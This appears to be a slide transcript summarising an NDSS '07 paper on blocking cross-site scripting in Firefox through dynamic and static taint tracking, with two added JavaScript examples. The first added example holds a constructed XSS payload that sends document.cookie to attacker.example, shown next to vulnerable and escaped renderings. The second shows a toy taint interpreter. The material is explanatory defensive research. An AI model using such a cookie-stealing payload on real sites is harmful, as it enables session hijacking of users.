Cross-Site Scripting Prevention with Dynamic Tainting and Static Analysis
By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna
Network and Distributed System Security Symposium (NDSS '07)
Authors
Philipp Vogt: main developer of the XSS Attack Prevention in Firefox project; cross-site scripting detection
Giovanni Vigna: Associate Professor at UCSB; web security, intrusion detection
Introduction[1/5]
Cross-Site Scripting: an attack against web applications in which malicious scripting code is injected into the output of an application, which is then delivered to a user's web browser.
This scripting code transfers sensitive information (for example the session cookie) to the attacker.
This information allows the attacker to impersonate the victim or hijack the victim's session.
Introduction[2/5]
Cross-Site Scripting (attack flow between Attacker, Server and Victim, from the slide's diagram):
1. The attacker sends the victim an email containing XSS code.
2. The victim sends a request containing the XSS code to the server.
3. The server sends a response containing the XSS code back to the victim.
4. The XSS code is executed in the victim's browser.
5. Sensitive information is transferred to the attacker.
Introduction[3/5]
Stored XSS: the attacker persistently stores the malicious code in a resource managed by the web application, such as a database. The actual attack is carried out at a later time, when the victim requests a dynamic page that includes the stored code.
Reflected XSS: the attack script is not persistently stored; instead, it is reflected (sent back) to the victim by the application. Example: sending the victim an email with a link that contains the malicious JavaScript code.
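Added example (not from the paper or these slides): a small JavaScript model of the two delivery methods above, with the vulnerable rendering beside an output-encoded version. The application names, the hosts victim.example and attacker.example, and the payload are constructed for illustration; the payload does what the introduction describes, namely sending the cookie to the attacker's host.

```javascript
// Added example (not from the paper or the slides). Illustrative names only.

// Constructed attacker payload: on execution it sends the cookie to a third-party host.
const PAYLOAD =
  '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>';

// Minimal HTML entity encoding, sufficient for text nodes and quoted attributes.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Reflected XSS: the search term arrives in the request and is echoed straight
// back in the response, so the attacker only needs the victim to follow a link.
function reflectedLink(query) {
  return 'http://victim.example/search?q=' + encodeURIComponent(query);
}
function queryFromLink(link) {
  return new URL(link).searchParams.get('q');   // what the server reads from the request
}
function renderSearchVulnerable(query) {
  return '<h1>Results for ' + query + '</h1>';
}
function renderSearchHardened(query) {
  return '<h1>Results for ' + escapeHtml(query) + '</h1>';
}

// Stored XSS: the comment is written into the application's storage (an array
// standing in for the database) and delivered to every later visitor.
const guestbook = [];
function postComment(text) { guestbook.push(text); }
function renderGuestbookVulnerable() {
  return '<ul>' + guestbook.map((c) => '<li>' + c + '</li>').join('') + '</ul>';
}
function renderGuestbookHardened() {
  return '<ul>' + guestbook.map((c) => '<li>' + escapeHtml(c) + '</li>').join('') + '</ul>';
}

// Crude stand-in for "the browser would execute this": does an intact <script>
// element survive in the page?
function wouldExecute(html) {
  return /<script\b/i.test(html);
}

// Run both scenarios; returns which renderings still carry an executable payload.
function demo() {
  const q = queryFromLink(reflectedLink(PAYLOAD));
  postComment(PAYLOAD);
  return {
    reflectedVulnerable: wouldExecute(renderSearchVulnerable(q)),
    reflectedHardened: wouldExecute(renderSearchHardened(q)),
    storedVulnerable: wouldExecute(renderGuestbookVulnerable()),
    storedHardened: wouldExecute(renderGuestbookHardened()),
  };
}
```

The difference between the two flavours is only where the payload waits: in the link the victim follows (reflected) or in the application's own storage (stored). In both cases the browser runs the script with the page's origin, which is why the paper's defence is placed in the browser rather than in any one application.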
Introduction[4/5]
Sensitive Data Sources
Introduction[5/5]
The Goal: a JavaScript program may send sensitive information only to the site from which it was loaded. To enforce this, the information flow of sensitive data is tracked inside the JavaScript engine of the browser. Whenever an attack (a transfer of sensitive data to a different site) is detected, the user is warned and given the possibility to stop the transfer.
Dynamic Tainting[1/5]
Dynamic Tainting: sensitive data is first marked (tainted), and then, when this data is accessed by scripts running in the web browser, its use is dynamically tracked by the system. It is sufficient to model the taint value associated with a piece of data as a simple boolean flag (tainted or not tainted).
Dynamic Tainting[2/5]
Taint Propagation, covering the following JavaScript constructs:
Assignments
Arithmetic and logic operations (+, -, &, etc.)
Control structures and loops (if, while, switch, for in)
Function calls and eval
Static Tainting[1/3]
Indirect Control Dependency: a variable assigned inside a branch whose condition depends on tainted data leaks information even though no tainted value flows into it directly. To cover both direct and indirect control dependencies, all possible program paths in a scope need to be examined, not only the path actually executed. Static analysis is therefore necessary.
Static Tainting[2/3]
Linear Static Taint Analysis: ensures that all variables that are assigned values (tainted or not) anywhere inside a tainted scope are also tainted, including variables on paths that were not executed.
Static Tainting[3/3]
Stack Analysis
SpiderMonkey executes stack-based bytecode, so the instructions responsible for setting object properties do not name the target object explicitly; the object is an operand on the stack.
The static analysis therefore simulates the operand stack with an abstract stack whose entries are boolean taint values.
Data Transmission
Tainted data has to be transferred to a third party, and a script can do this in a variety of ways. The check is performed at each of these transmission points:
Setting document.location
Setting the source of an image in the web page
Submitting a form in the web page
Using the XMLHttpRequest object
Evaluation[1/4]
XSS attacks: XSS samples collected by the group's members; the modified browser was successful in detecting them.
Manual test: the modified browser was used by the authors for web surfing on a daily basis. The overhead is negligible, and the number of false positives was low.
Evaluation[2/4]
Automatic test: a web crawling engine was integrated into the modified Firefox. It visited 1,033,000 unique web pages; 88,589 (8.58%) of them raised an XSS warning. The scripts raising these warnings are inserted into the web page with the consent of the web site owner, so they are false positives rather than attacks.
Evaluation[3/4]
Top 30 destination domains: these domains belong to companies that collect statistics about the traffic on their customers' web sites.
Excluding transfers to these 30 domains reduces the warnings to 13,964 pages (1.35%).
Reduced further to 5,289 pages (0.51%) if only transfers of cookies are considered.
Evaluation[4/4]
Reasons for the remaining (small number of) false positives:
Transfer of cookies to a different domain within the same company's borders (e.g. cnn.net -> cnn.com)
Transfer of cookies between different domains belonging to the same company (e.g. discover.com -> unitedstreaming.com)
Over-approximation by the indirect control-flow rule: every variable assigned in a tainted scope is tainted, whether or not it actually carries sensitive information
Conclusion
XSS attacks are prevented using dynamic taint analysis, complemented by static analysis where necessary.
The solution is integrated into the Firefox web browser by modifying its JavaScript engine.
It generates few false positives and is feasible in practice.
Extra - Dynamic Tainting[3/5]
Assignments: if the right-hand side of the assignment is tainted, then the target on the left-hand side is also tainted. Example: x = document.cookie; taints x. The variable that is assigned a tainted value is not the only object that must be tainted.
Arithmetic and Logic Operations: SpiderMonkey executes JavaScript as stack-based bytecode, so an operation first pops its operands from the stack and then pushes back the result. The result is tainted if one of the operands is tainted.
Extra - Dynamic Tainting[4/5]
Control Structures and Loops: if the condition of a control structure tests a tainted value, a tainted scope is generated that covers the whole control structure. A variable is dynamically tainted only when its value is modified inside such a scope during the actual execution of the program (hence the static analysis for the paths not taken).
Function Calls: if a function is defined in a tainted scope, the function itself (its operations, parameters and return value) is also tainted.
Eval: if eval is called in a tainted scope or if its parameter is tainted, a tainted scope is generated for the evaluated code.
Extra - Dynamic Tainting[5/5]
Example (code figure on the slide; not reproduced in this transcript)
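Added example, not the paper's SpiderMonkey patch: a tiny JavaScript interpreter over a toy AST-shaped language whose values carry the boolean taint flag, implementing the propagation rules summarised under Dynamic Tainting[2/5] and detailed in the extra slides (assignments, arithmetic and comparison, tainted scopes for control structures and loops) together with the static rule from Static Tainting[2/3] and the check at the send sink. The node shapes, the cookie value, the page host shop.example and the program that leaks one cookie character through a control dependency are all constructed for illustration; function calls and eval are not modelled.

```javascript
// Added example, not the paper's SpiderMonkey patch. Node shapes and names are assumptions.

const ORIGIN_HOST = 'shop.example';      // host the page was loaded from (assumed)

const tainted = (v) => ({ v, t: true });
const clean = (v) => ({ v, t: false });

// Operators of the toy language; the result of any of them is tainted if an operand is.
const OPS = {
  '+': (a, b) => a + b,
  '-': (a, b) => a - b,
  '&': (a, b) => a & b,
  '==': (a, b) => a === b,
  '<': (a, b) => a < b,
  'charAt': (a, b) => String(a).charAt(b),
};

// Static part: every variable assigned anywhere inside `stmts`, including on
// paths not taken at run time (the linear static taint analysis of the slides).
function assignedVars(stmts, out = new Set()) {
  for (const s of stmts) {
    if (s.k === 'assign') out.add(s.name);
    if (s.k === 'if') { assignedVars(s.then, out); assignedVars(s.else || [], out); }
    if (s.k === 'while') assignedVars(s.body, out);
  }
  return out;
}

// Execute `program` with the given taint sources; returns the final environment
// and the decision taken at each send sink.
function run(program, sources) {
  const env = new Map();
  const events = [];
  const lookup = (name) => env.get(name) || clean(undefined);

  function evalExpr(e) {
    switch (e.k) {
      case 'lit': return clean(e.v);
      case 'var': return lookup(e.name);
      case 'source': return tainted(sources[e.name]);       // marking the sensitive source
      case 'bin': {
        const l = evalExpr(e.l), r = evalExpr(e.r);
        return { v: OPS[e.op](l.v, r.v), t: l.t || r.t };   // arithmetic/logic rule
      }
      default: throw new Error('unknown expression ' + e.k);
    }
  }

  // `scopeTainted` is true while executing inside a control structure whose
  // condition tested a tainted value: the dynamic "tainted scope".
  function exec(stmts, scopeTainted) {
    for (const s of stmts) {
      switch (s.k) {
        case 'assign': {                                     // assignment rule
          const r = evalExpr(s.e);
          env.set(s.name, { v: r.v, t: r.t || scopeTainted });
          break;
        }
        case 'if':
        case 'while': {                                      // control structures and loops
          let c = evalExpr(s.cond);
          const inner = scopeTainted || c.t;
          if (s.k === 'if') exec(c.v ? s.then : (s.else || []), inner);
          else for (let i = 0; c.v && i < 1000; i++) { exec(s.body, inner); c = evalExpr(s.cond); }
          if (inner) {                                       // static rule over every path of the scope
            const paths = s.k === 'if' ? [...s.then, ...(s.else || [])] : s.body;
            for (const name of assignedVars(paths)) env.set(name, { ...lookup(name), t: true });
          }
          break;
        }
        case 'send': {                                       // transmission sink check
          const val = evalExpr(s.e);
          const host = new URL(s.dest).hostname;
          const blocked = val.t && host !== ORIGIN_HOST;
          events.push({ host, tainted: val.t, action: blocked ? 'warn' : 'allow' });
          break;
        }
        default: throw new Error('unknown statement ' + s.k);
      }
    }
  }
  exec(program, false);
  return { env, events };
}

// Constructed program: leaks whether the cookie starts with 's' purely through a
// control dependency (no tainted value is ever copied into `bit`), then sends
// `bit` to a third-party image URL.
const PROGRAM = [
  { k: 'assign', name: 'c', e: { k: 'source', name: 'document.cookie' } },
  { k: 'assign', name: 'ch', e: { k: 'bin', op: 'charAt', l: { k: 'var', name: 'c' }, r: { k: 'lit', v: 0 } } },
  { k: 'assign', name: 'bit', e: { k: 'lit', v: 0 } },
  { k: 'if', cond: { k: 'bin', op: '==', l: { k: 'var', name: 'ch' }, r: { k: 'lit', v: 's' } },
    then: [{ k: 'assign', name: 'bit', e: { k: 'lit', v: 1 } }], else: [] },
  { k: 'send', dest: 'http://attacker.example/i.gif', e: { k: 'var', name: 'bit' } }, // exfiltration: warn
  { k: 'send', dest: 'http://shop.example/stats', e: { k: 'var', name: 'bit' } },     // own host: allow
  { k: 'send', dest: 'http://attacker.example/j.gif', e: { k: 'lit', v: 'static' } }, // untainted: allow
];

// Run the leak with a given cookie; `bit` ends up tainted whether or not the branch executes.
function demo(cookie) {
  const r = run(PROGRAM, { 'document.cookie': cookie });
  return { bit: r.env.get('bit'), actions: r.events.map((ev) => ev.action) };
}
```

Without the static step after the if, a cookie that does not start with 's' would skip the branch, leave bit untainted, and let the first send through, which is exactly the indirect control dependency the static analysis closes. The same over-approximation is also why the evaluation lists the control-flow rule among the sources of false positives: every variable assigned in the scope is tainted, not only those that depend on the condition.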
Extra - Implementation
Extends Mozilla Firefox 1.0pre. Two parts of the browser can contain tainted data objects:
The JavaScript engine (SpiderMonkey): variables, functions, scopes and objects
The DOM tree: location.href, etc.
Every time a JavaScript program attempts to transfer sensitive data, a check is performed to determine whether the sensitive data is being sent to the page's own host; a transfer to any other host raises the warning.